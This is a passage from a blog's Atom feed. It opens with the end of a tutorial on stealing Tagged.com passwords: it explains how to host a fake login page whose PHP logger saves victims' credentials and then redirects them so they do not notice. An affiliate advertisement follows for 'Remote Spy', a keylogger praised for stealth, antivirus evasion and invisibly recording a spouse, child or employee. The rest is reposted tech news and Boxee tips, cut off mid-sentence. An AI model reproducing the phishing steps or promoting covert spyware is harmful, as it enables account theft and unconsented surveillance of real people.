/&gt;7.So just &lt;span style="font-weight: bold;"&gt;create&lt;/span&gt; an &lt;span style="font-weight: bold;"&gt;account&lt;/span&gt; in any of the above sites (i  prefer 110mb.com because it is much easier)&lt;br /&gt;&lt;br /&gt;8.Now just get into your &lt;span style="font-weight: bold;"&gt;file manager&lt;/span&gt;&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/_1L4JANWq3tI/Spi0WRd-34I/AAAAAAAAAXY/5uigmIo_mxw/s1600-h/fileman.png" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"&gt;&lt;img alt="" border="0" id="BLOGGER_PHOTO_ID_5375244450005966722" src="http://2.bp.blogspot.com/_1L4JANWq3tI/Spi0WRd-34I/AAAAAAAAAXY/5uigmIo_mxw/s400/fileman.png" style="cursor: pointer; display: block; height: 121px; margin: 0px auto 10px; text-align: center; width: 224px;" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;b&gt;&lt;br /&gt;9.&lt;/b&gt;And then &lt;span style="font-weight: bold;"&gt;upload the files&lt;/span&gt;&lt;span class="fullpost"&gt;(&lt;span style="font-weight: bold;"&gt;DO NOT UPLOAD IN A  DIRECTORY&lt;/span&gt;)&lt;/span&gt; and just&lt;span style="font-weight: bold;"&gt; test&lt;/span&gt;  it by going to&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;http://yoursite.110mb.com/Tagged.htm&lt;/span&gt;  for the &lt;span style="font-weight: bold;"&gt;fake login page&lt;/span&gt;.Just &lt;span style="font-weight: bold;"&gt;type&lt;/span&gt; some &lt;span style="font-weight: bold;"&gt;info&lt;/span&gt; into the text box and then you will see in your file  manager that a file called "&lt;span style="font-weight: bold;"&gt;TaggedPasswords.htm&lt;/span&gt;"  is &lt;span style="font-weight: bold;"&gt;created&lt;/span&gt;&lt;br /&gt;&lt;div id="TixyyLink" style="background-color: transparent; border: medium none; color: black; overflow: hidden; text-align: left; text-decoration: none;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_fMrF3L8CTmg/S2QFibKBuOI/AAAAAAAAAM8/nUnzFizWEu0/s1600-h/Zapak.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="227" src="http://1.bp.blogspot.com/_fMrF3L8CTmg/S2QFibKBuOI/AAAAAAAAAM8/nUnzFizWEu0/s400/Zapak.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div id="TixyyLink" style="background-color: transparent; border: medium none; color: black; overflow: hidden; text-align: left; text-decoration: none;"&gt;&lt;br /&gt;10.Go to&lt;span style="font-weight: bold;"&gt;  http://yoursite.110mb.com/TaggedPasswords.htm&lt;/span&gt; for the &lt;span style="font-weight: bold;"&gt;stored passwords&lt;/span&gt; !&lt;br /&gt;&lt;div id="TixyyLink" style="background-color: transparent; border: medium none; color: black; overflow: hidden; text-align: left; text-decoration: none;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;span style="font-weight: bold;"&gt;How it works ?&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;When a user types a Username &amp;amp; Password in the the text box,The info  is sent to "login.php" which acts as a password logger and redirects  the page to "LoginFrame2.htm" which shows "There has been a temporary  error Please Try Again" in it .So when the person clicks on try again it  redirects to the actual URL so that the victim does not know that  yoursite is a fake site and gets his &lt;b&gt;Tagged.com password hacked&lt;/b&gt;&lt;br /&gt;Cheers ! you can leave your comments if you have lost your way ! &lt;br /&gt;&lt;div id="TixyyLink" style="background-color: transparent; border: medium none; color: black; overflow: hidden; text-align: left; text-decoration: none;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7452296460835263490-4326015239861154736?l=bhaukadimag.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bhaukadimag.blogspot.com/feeds/4326015239861154736/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://bhaukadimag.blogspot.com/2010/01/hack-taggedcom-password.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7452296460835263490/posts/default/4326015239861154736'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7452296460835263490/posts/default/4326015239861154736'/><link rel='alternate' type='text/html' href='http://bhaukadimag.blogspot.com/2010/01/hack-taggedcom-password.html' title='Hack Tagged.com password'/><author><name>Akshay</name><uri>http://www.blogger.com/profile/16873342237628129989</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='16479660345720215528'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_1L4JANWq3tI/Spi0WRd-34I/AAAAAAAAAXY/5uigmIo_mxw/s72-c/fileman.png' height='72' width='72'/><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7452296460835263490.post-8661784928622213127</id><published>2010-01-31T06:48:00.001-08:00</published><updated>2010-01-31T06:48:49.030-08:00</updated><title type='text'>Remote Spy</title><content type='html'>&lt;div style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img alt="remote spy" http:="" remoteinstallkeyloggers.com="" remotespy-bx.jpg="" src="http://remoteinstallkeyloggers.com/remotespy-bx.jpg" title="Remote spy software" /&gt; &lt;/div&gt;&lt;br /&gt;In have made my best to make you aware of&amp;nbsp; &lt;b&gt;&lt;a href="http://rafayhackingarticles.blogspot.com/search/label/Password%20Hacking%20softwares"&gt;Remote  password hacking softwares &lt;/a&gt;&lt;/b&gt;availible in marker,i told you about  one of the leading spywares in the industry and explained its  features,I was testing some of keylogger&amp;nbsp; i found a Remote password  spying software called &lt;a href="https://www.plimus.com/jsp/buynow.jsp?contractId=2385070&amp;amp;referrer=rafay112"&gt;&lt;b&gt;Remote  spy&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="" name="more"&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Unlike software solutions, &lt;a href="http://www.plimus.com/jsp/redirect.jsp?contractId=2385070&amp;amp;referrer=rafay112"&gt;&lt;b&gt;Remote  Spy&lt;/b&gt;&lt;/a&gt; features innovative anti-detection routines and a firewall  bypassing option unavailable in other remote &lt;span class="IL_AD" id="IL_AD2"&gt;computer monitoring&lt;/span&gt; products. This allows for quick  and easy monitoring of your remote or local computer with no extraneous  configuration needed. No longer be stuck choosing between disabling your  &lt;span class="IL_AD" id="IL_AD1"&gt;security software&lt;/span&gt; and recording  the &lt;span class="IL_AD" id="IL_AD3"&gt;activity&lt;/span&gt; of your local or  remote computer. Begin receiving internet activity logs from your  monitored computer within minutes of deployment.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size: large;"&gt;&lt;b&gt;Remote Spy Features:&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;div style="color: #3d85c6;"&gt;&lt;b&gt;Powerful Computer Monitoring  and Spy Software!&lt;/b&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;* Internet Conversation Logging -&lt;/b&gt; Record both sides of all chat  and instant message conversations (unlike basic keyloggers) for AOL,  ICQ, MSN (Windows Live), AIM, Yahoo, GoogleTalk, Skype, PalTalk and  XFire Instant Messengers. Find out who your employee, child or spouse is  speaking with online while using your computer.&lt;br /&gt;&lt;br /&gt;* &lt;b&gt;Screenshot Logging - &lt;/b&gt;Capture full-size computer monitoring  screenshots of your computer's desktop. Visually see exactly what is  occurring on your monitored computer at regular intervals.&lt;br /&gt;&lt;br /&gt;* &lt;b&gt;Advanced Password Logging -&lt;/b&gt; Uncover and store usernames and  passwords used on your computer even if the data is already present  behind asterisks (***). Works for both windows applications and Internet  Explorer websites featuring a password box. This is extremely useful in  the case of a computer crashes when you've lost your data and have no  other way to recover your valuable passwords and usernames: RemoteSpy  can be your backup solution!&lt;br /&gt;&lt;br /&gt;* Window Activity Logging - Capture information on every window viewed  and interacted with for maximum proof. All window titles will be  captured secretly.&lt;br /&gt;&lt;br /&gt;* &lt;b&gt;Application Activity Logging &lt;/b&gt;- Track every  application/executable that was executed and interacted with on your  computer. If they open an application on your PC, it will be recorded.&lt;br /&gt;&lt;br /&gt;* &lt;b&gt;Keystroke Monitoring &lt;/b&gt;- Track all keystrokes pressed via a  built-in keylogger [including hidden system keys!] and which windows  they were pressed in. Keystrokes can also be passed through a formatter  for easy viewing/exporting.&lt;br /&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;br /&gt;&lt;b&gt;* Website Activity Logging&lt;/b&gt; - Log all website titles and addresses  that were visited on your PC. All information is recorded invisibly for  you to view anytime! Supported browsers include Internet Explorer,  Firefox, Netscape, Opera, Chrome and more&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Automatically Records All:&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;* Applications&lt;br /&gt;* Web Sites Visited&lt;br /&gt;* Chat Conversations&lt;br /&gt;* Keystrokes Typed&lt;br /&gt;* Display Screens&lt;br /&gt;* Emails Typed&lt;br /&gt;* Plus Much More!&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Automatically Records:&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;* AOL Chat Rooms&lt;br /&gt;* &lt;span class="IL_AD" id="IL_AD5"&gt;AOL Instant Messenger&lt;/span&gt;&lt;br /&gt;* MSN Instant Messenger&lt;br /&gt;* ICQ Messenger&lt;br /&gt;* Yahoo Messenger&lt;br /&gt;* Trillian Messenger&lt;br /&gt;* All Chat Rooms&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Can Invisibly Record:&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;* Your Children&lt;br /&gt;* Your Employees&lt;br /&gt;* Or Any User on Your Computer!&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Our Bonus Features:&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;* Super Stealth Mode&lt;br /&gt;* Password Protection&lt;br /&gt;* Realtime Recording&lt;br /&gt;* Automatic Recording&lt;br /&gt;* Inactivity Timeout&lt;br /&gt;* Fast File Searching&lt;br /&gt;* Log File Exporting&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Sniperspy VS Remote spy&lt;/b&gt; :&lt;br /&gt;Which is better Sniperspy  or Remotespy,well both &lt;b&gt;remote spying softwares&lt;/b&gt; are better in  different ways,Sniperspy has a feature through which you can moniter a  computer like &lt;span class="IL_AD" id="IL_AD7"&gt;a television&lt;/span&gt; screen  and &lt;b&gt;remote  spy&lt;/b&gt; has a less antivirus detection rate and more features&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7452296460835263490-8661784928622213127?l=bhaukadimag.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bhaukadimag.blogspot.com/feeds/8661784928622213127/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://bhaukadimag.blogspot.com/2010/01/remote-spy.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7452296460835263490/posts/default/8661784928622213127'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7452296460835263490/posts/default/8661784928622213127'/><link rel='alternate' type='text/html' href='http://bhaukadimag.blogspot.com/2010/01/remote-spy.html' title='Remote Spy'/><author><name>Akshay</name><uri>http://www.blogger.com/profile/16873342237628129989</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='16479660345720215528'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7452296460835263490.post-7277907922620329703</id><published>2010-01-26T08:41:00.000-08:00</published><updated>2010-01-26T08:41:11.186-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Augmented Reality Turns Shoes Into Game Controllers'/><title type='text'>Augmented Reality Turns Shoes Into Game Controllers</title><content type='html'>&lt;img alt="" height="176" src="http://cdn.mashable.com/wp-content/uploads/2010/01/adidas-AR-shoes-260.jpg" title="adidas-AR-shoes-260" width="260" /&gt;Augmented reality has made for some uniquely enhanced objects and applications of late, from meta-iPhones to music videos to new experiments in print publishing.&lt;br /&gt;Enter Adidas and its take on AR technology: augmented reality footwear. The Originals AR Game Pack is a series of five shoe styles that will have an AR code built in to the tongue. When held in front of a webcam, the code will unlock access to an area on Adidas’s website with a series of interactive games in which your shoe actually becomes the game controller.&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;New games will launch once per month between February and April, with the whole series kicking off February 10. The shoes themselves are available already in UK and select other countries, with a U.S. debut coming February 15.&lt;br /&gt;We’ve already seen a number of innovative uses of AR in product marketing, and this example shows promise — although it will come down to how interesting the actual games themselves are. Would you be interested in a sneaker that transforms into a game controller for your next pair of kicks?&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7452296460835263490-7277907922620329703?l=bhaukadimag.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bhaukadimag.blogspot.com/feeds/7277907922620329703/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://bhaukadimag.blogspot.com/2010/01/augmented-reality-turns-shoes-into-game.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7452296460835263490/posts/default/7277907922620329703'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7452296460835263490/posts/default/7277907922620329703'/><link rel='alternate' type='text/html' href='http://bhaukadimag.blogspot.com/2010/01/augmented-reality-turns-shoes-into-game.html' title='Augmented Reality Turns Shoes Into Game Controllers'/><author><name>Akshay</name><uri>http://www.blogger.com/profile/16873342237628129989</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='16479660345720215528'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7452296460835263490.post-73988805529632490</id><published>2010-01-26T08:40:00.000-08:00</published><updated>2010-01-26T08:40:18.925-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='IM Faceoff: AIM vs. GTalk vs. FbChat'/><title type='text'>IM Faceoff: AIM vs. GTalk vs. FbChat</title><content type='html'>&lt;img src="http://cdn.mashable.com/wp-content/uploads/2010/01/faceoff-im-260.jpg" /&gt;Instant messaging (IM) has been around for a &lt;em&gt;long&lt;/em&gt; time.  Hell, it actually predates the Internet, yet it’s an ubiquitous and essential part of our social online experience.  So we want to know: &lt;em&gt;which instant messaging tool is best?&lt;/em&gt;&lt;br /&gt;To figure out the answer to this question, we want you, the readers, to decide.  This week’s Web Faceoff, our weekly series where we pit web apps against one another for your vote, focuses on three of the biggest and best-known IM clients: Facebook Chat (FbChat), Google Talk (GTalk), and AOL Instant Messenger (AIM)&lt;br /&gt;AIM is the oldest and largest of the IM clients by far,  but both Gtalk and FbChat serve billions of IMs every single day. Is GTalk’s integration with email enough to overcome AIM, or does Facebook’s 350+ million users give its chat service the edge?&lt;br /&gt;We’ll let you decide the answer that question. The poll below closes on Friday, January 29th at 12:00 PM PT. Let us know your allegiance in the comments:&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7452296460835263490-73988805529632490?l=bhaukadimag.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bhaukadimag.blogspot.com/feeds/73988805529632490/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://bhaukadimag.blogspot.com/2010/01/im-faceoff-aim-vs-gtalk-vs-fbchat.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7452296460835263490/posts/default/73988805529632490'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7452296460835263490/posts/default/73988805529632490'/><link rel='alternate' type='text/html' href='http://bhaukadimag.blogspot.com/2010/01/im-faceoff-aim-vs-gtalk-vs-fbchat.html' title='IM Faceoff: AIM vs. GTalk vs. FbChat'/><author><name>Akshay</name><uri>http://www.blogger.com/profile/16873342237628129989</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='16479660345720215528'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7452296460835263490.post-7611714488934006577</id><published>2010-01-26T08:38:00.001-08:00</published><updated>2010-01-26T08:38:42.336-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Could These Be Pictures of the Real Apple Tablet? [PICS]'/><title type='text'>Could These Be Pictures of the Real Apple Tablet? [PICS]</title><content type='html'>&lt;img src="http://cdn.mashable.com/wp-content/uploads/2010/01/tablet-260.jpg" width="260px" /&gt;New pictures claiming to be &lt;strong&gt;the&lt;/strong&gt; Apple Tablet have surfaced, and they’re the most realistic ones we’ve seen yet.&lt;br /&gt;The images, posted by designer and user interface guy Dustin Curtis, reveal what appears to be the tablet on top of a MacBook pro.  He posted the images on his Posterous.&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;While we cannot verify or debunk their authenticity, they are the most complete images we’ve seen yet of the rumored device. Without the interface running, any video, or a picture of its backside, we can’t even guess as to whether they’re real. Our gut says no, but they’re convincing images.&lt;br /&gt;We already knew of Dustin Curtis — he’s a talented designer that got attention for his mockup redesign of the American Airlines website and the subsequent firing of an AA employee who gave him a response.&lt;br /&gt;Take a look at these pretty pics; we’ll do the investigating to try to determine if they’re real. Let us know what you think of the images in the comments.&lt;br /&gt;&lt;hr /&gt;&lt;h2&gt;The Tablet Images&lt;/h2&gt;&lt;hr /&gt;&lt;center&gt;&lt;br /&gt;&lt;img src="http://cdn.mashable.com/wp-content/uploads/2010/01/tablet1.jpeg" width="640px" /&gt;&lt;/center&gt;&lt;center&gt;&lt;br /&gt;&lt;img src="http://cdn.mashable.com/wp-content/uploads/2010/01/tablet2.jpg" /&gt;&lt;/center&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7452296460835263490-7611714488934006577?l=bhaukadimag.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bhaukadimag.blogspot.com/feeds/7611714488934006577/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://bhaukadimag.blogspot.com/2010/01/could-these-be-pictures-of-real-apple.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7452296460835263490/posts/default/7611714488934006577'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7452296460835263490/posts/default/7611714488934006577'/><link rel='alternate' type='text/html' href='http://bhaukadimag.blogspot.com/2010/01/could-these-be-pictures-of-real-apple.html' title='Could These Be Pictures of the Real Apple Tablet? [PICS]'/><author><name>Akshay</name><uri>http://www.blogger.com/profile/16873342237628129989</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='16479660345720215528'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7452296460835263490.post-4587825686831911306</id><published>2010-01-26T08:37:00.002-08:00</published><updated>2010-01-26T08:37:42.623-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Google Toolbar Keeps Tracking Your Browsing Even After You Choose Disable?'/><title type='text'>Google Toolbar Keeps Tracking Your Browsing Even After You Choose Disable?</title><content type='html'>&lt;a href="http://cdn.mashable.com/wp-content/uploads/2009/01/google-toolbar-beta.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img align="right" border="0" src="http://cdn.mashable.com/wp-content/uploads/2009/01/google-toolbar-beta.jpg" /&gt;&lt;/a&gt;Security expert Ben Edelman has done some digging, and he’s discovered that Google toolbar keeps tracking your browsing even after you disable that option. He’s also noticed that Google makes it easier to enable than disable certain tracking features, all of which make the Google toolbar a somewhat shady affair if you’re concerned about your privacy.&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;A very detailed explanation can be found on Edelman’s blog. In addition to the problems named above, he also quotes some bits from Google Toolbar’s installation and privacy disclosures, which seem to have worsened over time.&lt;br /&gt;Google has recently taken a very big step towards protecting their users’ security and privacy by refusing to operate under some of China’s rules. But it makes it easy to forget that Google itself has a history of privacy issues, some of which seemingly still haven’t been resolved.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7452296460835263490-4587825686831911306?l=bhaukadimag.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bhaukadimag.blogspot.com/feeds/4587825686831911306/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://bhaukadimag.blogspot.com/2010/01/google-toolbar-keeps-tracking-your.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7452296460835263490/posts/default/4587825686831911306'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7452296460835263490/posts/default/4587825686831911306'/><link rel='alternate' type='text/html' href='http://bhaukadimag.blogspot.com/2010/01/google-toolbar-keeps-tracking-your.html' title='Google Toolbar Keeps Tracking Your Browsing Even After You Choose Disable?'/><author><name>Akshay</name><uri>http://www.blogger.com/profile/16873342237628129989</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='16479660345720215528'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7452296460835263490.post-2021078365530170021</id><published>2010-01-26T08:37:00.000-08:00</published><updated>2010-01-26T08:37:01.447-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='More Security Flaws Found in Internet Explorer'/><title type='text'>More Security Flaws Found in Internet Explorer</title><content type='html'>&lt;a href="http://cdn.mashable.com/wp-content/uploads/2008/02/internetexplorer.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img align="right" border="0" height="194" src="http://cdn.mashable.com/wp-content/uploads/2008/02/internetexplorer.jpg" width="200" /&gt;&lt;/a&gt;It’s been a rough few weeks for the Microsoft’s Internet Explorer. First, Google revealed that Chinese hackers have used an undocumented security flaw in IE to access personal data of some of their employees. Microsoft did not immediately issue a fix, which prompted both the German and the French government to warn against using Microsoft’s browser.&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;Now, when they’ve finally fixed that hole, a set of new serious security flaws has emerged.&lt;br /&gt;The new flaws were found by Core Security Technologies; each of the vulnerabilities is not very serious by itself, but if an attacker manages to exploit several of them at once he/she could take control of the victim’s computer.&lt;br /&gt;Microsoft gave Ars Technica their standard response: “Microsoft is investigating a responsibly disclosed vulnerability in Internet Explorer. We’re currently unaware of any attacks trying to use the vulnerability or of customer impact, and believe customers are at reduced risk due to responsible disclosure.” Still, although Internet Explorer 8 has improved a lot compared to the security Swiss cheese that was IE6, these latest flaws make us remember the bad old days when Internet Explorer 6 was the dominant browser and when new security flaws in it were found almost on a daily basis.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7452296460835263490-2021078365530170021?l=bhaukadimag.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bhaukadimag.blogspot.com/feeds/2021078365530170021/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://bhaukadimag.blogspot.com/2010/01/more-security-flaws-found-in-internet.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7452296460835263490/posts/default/2021078365530170021'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7452296460835263490/posts/default/2021078365530170021'/><link rel='alternate' type='text/html' href='http://bhaukadimag.blogspot.com/2010/01/more-security-flaws-found-in-internet.html' title='More Security Flaws Found in Internet Explorer'/><author><name>Akshay</name><uri>http://www.blogger.com/profile/16873342237628129989</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='16479660345720215528'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7452296460835263490.post-3064751653537346014</id><published>2010-01-26T08:35:00.000-08:00</published><updated>2010-01-26T08:35:23.023-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='HOW TO: Get the Most Out of the Boxee Beta'/><title type='text'>HOW TO: Get the Most Out of the Boxee Beta</title><content type='html'>&lt;img alt="" height="190" src="http://mashable.com/wp-content/uploads/2009/12/boxee-beta-sm.jpg" title="boxee-beta-sm" width="260" /&gt;We’re big fans of Boxee, the media center with a social twist. At CES 2010, Mashable editor Barb Dybwad got a hands-on look at the upcoming Boxee Box which will be just one of many IPTV devices to hit stores this year. However, you don’t have to wait for the Boxee Box to start using Boxee, as the software is already available for Mac, Windows and Linux systems. The Boxee Beta was officially released a few weeks ago and if you haven’t given it a shot, it’s really something you should check out.&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;As a long-time Boxee user, I thought I would compile some tips for making the Boxee experience even better. Be sure to add your own tips and suggestions to the comments!&lt;br /&gt;&lt;span&gt;&lt;/span&gt;&lt;br /&gt;&lt;hr /&gt;&lt;h2&gt;Get a Remote&lt;/h2&gt;&lt;hr /&gt;Although Boxee is designed to work just fine with a keyboard or mouse, the platform really shines when paired with a remote control. Boxee can work with remotes made for Mac (both the white remote control that comes with the Apple TV and used to get packaged with all Macintosh computers or the new aluminum remote control), Windows Media Center and even higher-end fair like the Logitech Harmony series.&lt;br /&gt;Additionally, if you have an iPhone or iPod touch, there are literally dozens of fantastic WiFi remote applications that you can use to control your Boxee experience, including Boxee’s official iPhone Remote (iTunes link), which is free and easy to set-up.&lt;br /&gt;Here are a few suggestions to keep in mind when choosing a remote control:&lt;br /&gt;&lt;blockquote&gt; - If you have a Mac running Mac OS X 10.6 Snow Leopard, install this handy little Preference Pane utility called Candelair. It’s free and it was created by the same people behind the fantastic Remote Buddy application. Why do you need Candelair? Well, with Mac OS X 10.6, Apple changed how some applications respond to the Apple Remote and consequently, apps like Boxee don’t work with the remote like they did in the past. Install this free utility and enable Legacy Remote support and you’re good to go.&lt;br /&gt;&lt;/blockquote&gt;&lt;div style="text-align: center;"&gt;&lt;img alt="" height="435" src="http://mashable.com/wp-content/uploads/2010/01/candelair.jpg" title="candelair" width="640" /&gt;&lt;br /&gt;&lt;/div&gt;&lt;blockquote&gt; - If you want a little more oomph in your iPhone or iPod touch remote application, check out HippoRemote. While there are dozens of great remote/VNC apps out there, HippoRemote remains my favorite because of its built-in program profiles (including Boxee), great trackpad support and the ability to do stuff like Wake-on-LAN which is really nice if you are using Boxee in your living room.&lt;br /&gt;- Check the Boxee Forums. The Boxee Forums have a dedicated sub-forum just for remote inquiries, so check that out if you need any tips or buying suggestions.&lt;br /&gt;&lt;/blockquote&gt;&lt;hr /&gt;&lt;h2&gt;Name and Organize Your Files The Right Way&lt;/h2&gt;&lt;hr /&gt;This is a tip that really works for any media center setup, not just Boxee, and it takes some time, but the net gain is totally worth it. Organize and name your files the right way. Although you can add local and networked sources to Boxee with ease, you can reduce the amount of time that the software will spend scanning for updates and trying to find stuff if you keep things as organized as possible.&lt;br /&gt;Here are some tips:&lt;br /&gt;&lt;blockquote&gt;&lt;strong&gt; Organize into folders by media type.&lt;/strong&gt; You don’t necessarily have to get as specific as Artist, Album, TV Show, Season, etc., but just having movies in a Movie folder, music in a Music folder, and TV shows in a TV Show folder can go a long way to make it easier for you to find stuff if you need to browse manually and for Boxee to automatically start associating files with meta-data.&lt;br /&gt;&lt;strong&gt;Name your TV show files using the sXXeXX format.&lt;/strong&gt; For instance, if you have an episode of “30 Rock” The file name should be something like &lt;strong&gt;30.Rock.s04e11.avi&lt;/strong&gt; (meaning season 4, episode 11) or something similar. You don’t have to be that picky about using periods or underscores, modern files systems will understand spaces, but make sure you have the show title and the season and episode number in the title so that when Boxee does a comparison against IMDB and other sources it can get the right artwork and description info.&lt;br /&gt;&lt;/blockquote&gt;&lt;div style="text-align: center;"&gt;&lt;img alt="" height="398" src="http://mashable.com/wp-content/uploads/2010/01/boxee-file-name-style.jpg" title="boxee-file-name-style" width="640" /&gt;&lt;br /&gt;&lt;/div&gt;&lt;blockquote&gt;&lt;strong&gt;Make shortcuts to favorite or frequently used folders.&lt;/strong&gt; One of the best features of the Boxee Beta is the new homescreen layout and the ability to add shortcuts directly to folders or directories or applications. If you have a local source that you frequently use to add new content to, add a shortcut to it so that you can easily access it.&lt;br /&gt;&lt;/blockquote&gt;&lt;img alt="" height="416" src="http://mashable.com/wp-content/uploads/2010/01/boxee-shortcuts.jpg" title="boxee-shortcuts" width="640" /&gt;&lt;br /&gt;&lt;hr /&gt;&lt;h2&gt;Access Mature Hulu Content via Boxee&lt;/h2&gt;&lt;hr /&gt;As it stands, Boxee works with Hulu (in an unofficial capacity) by using its built-in Mozilla-based Boxee Browser, and by associating shows in its TV database with their Hulu counterparts. The only 